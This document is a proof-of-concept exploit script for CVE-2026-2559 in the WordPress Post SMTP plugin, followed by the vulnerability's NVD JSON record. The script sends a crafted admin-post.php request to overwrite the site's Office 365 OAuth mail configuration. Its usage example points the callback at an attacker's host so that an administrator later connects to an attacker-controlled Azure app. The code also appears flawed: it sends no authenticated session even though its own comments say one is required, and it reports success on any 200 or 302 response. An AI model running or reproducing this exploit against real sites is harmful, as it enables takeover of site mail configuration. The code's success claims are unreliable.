CVE-2026-2559

import requests import sys from urllib.parse import urlencode # CVE-2026-2559 PoC - Post SMTP Office365 OAuth Configuration Hijacking # Target: WordPress site with Post SMTP plugin <= 3.8.0 # Author: Generated PoC def exploit_oauth_redirect(target_url, attacker_callback_url): """ Exploit the missing capability check in handle_office365_oauth_redirect() This allows authenticated users (subscriber+) to overwrite OAuth config """ # Craft the malicious OAuth redirect URL # The function is hooked to admin_init without nonce verification exploit_params = { 'action': 'post_smtp_office365_oauth_redirect', 'code': 'attacker_access_token_or_authorization_code', 'state': 'attacker_session_state', 'redirect_uri': attacker_callback_url } # Target the admin-post.php endpoint exploit_url = f"{target_url.rstrip('/')}/wp-admin/admin-post.php" print(f"[*] Target: {target_url}") print(f"[*] Exploit URL: {exploit_url}") print(f"[*] Sending crafted request...") # Send the exploit request (requires authenticated session with subscriber+ role) response = requests.get(exploit_url, params=exploit_params, allow_redirects=False) print(f"[*] Response Status: {response.status_code}") if response.status_code in [200, 302]: print("[+] Request sent successfully") print("[+] OAuth configuration may have been overwritten") print("[+] Next: Wait for admin to configure Pro version SMTP") print("[+] Admin will unknowingly connect to attacker's Azure app") else: print("[-] Exploit failed") return response if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <attacker_callback_url>") print(f"Example: python {sys.argv[0]} http://victim.com https://attacker.com/callback") sys.exit(1) target = sys.argv[1] callback = sys.argv[2] exploit_oauth_redirect(target, callback)

{"cve": {"id": "CVE-2026-2559", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:27.217", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Post SMTP plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `handle_office365_oauth_redirect()` function in all versions up to, and including, 3.8.0. This is due to the function being hooked to `admin_init` without any `current_user_can()` check or nonce verification. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the site's Office 365 OAuth mail configuration (access token, refresh token, and user email) via a crafted URL. The configuration option is used during wizard setup of Microsoft365 SMTP, only available in the Pro option of the plugin. This could cause an Administrator to believe an attacker-controlled Azure app is their own, and lead them to connect the plugin to the attacker's account during configuration after upgrading to Pro."}, {"lang": "es", "value": "El plugin Post SMTP para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en la función `handle_office365_oauth_redirect()` en todas las versiones hasta la 3.8.0, inclusive. Esto se debe a que la función está enganchada a `admin_init` sin ninguna verificación de `current_user_can()` o verificación de nonce. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, sobrescriban la configuración de correo OAuth de Office 365 del sitio (token de acceso, token de actualización y correo electrónico del usuario) a través de una URL manipulada. La opción de configuración se utiliza durante la configuración guiada de SMTP de Microsoft365, solo disponible en la opción Pro del plugin. Esto podría hacer que un Administrador crea que una aplicación de Azure controlada por un atacante es suya, y los lleve a conectar el plugin a la cuenta del atacante durante la configuración después de actualizar a Pro."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Wizard/NewWizard.php#L104", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Wizard/NewWizard.php#L2109", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3484515/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/323436b5-fbfe-4923-8b08-93c1fcabc016?source=cve", "source": "[email protected]"}]}}